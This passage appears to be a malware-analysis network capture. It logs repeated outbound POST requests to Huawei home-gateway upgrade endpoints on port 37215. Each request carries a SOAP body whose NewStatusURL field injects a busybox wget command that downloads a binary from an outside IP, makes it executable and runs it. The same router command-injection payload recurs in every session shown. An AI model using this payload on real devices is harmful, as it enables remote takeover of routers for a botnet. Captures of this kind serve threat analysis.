2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            356192.168.2.1537974197.76.215.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781523943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            357192.168.2.1554168197.154.168.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781558037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            358192.168.2.1534644197.109.109.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781584978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            359192.168.2.1541998197.63.148.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781616926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            360192.168.2.1549626197.17.75.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781642914 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            361192.168.2.1553554197.171.202.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781668901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            362192.168.2.1557312197.218.238.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781698942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            363192.168.2.1538356197.119.68.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781733036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            364192.168.2.1534626197.185.115.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781740904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            365192.168.2.1538364197.175.49.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781790018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            366192.168.2.1556314197.136.51.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781793118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
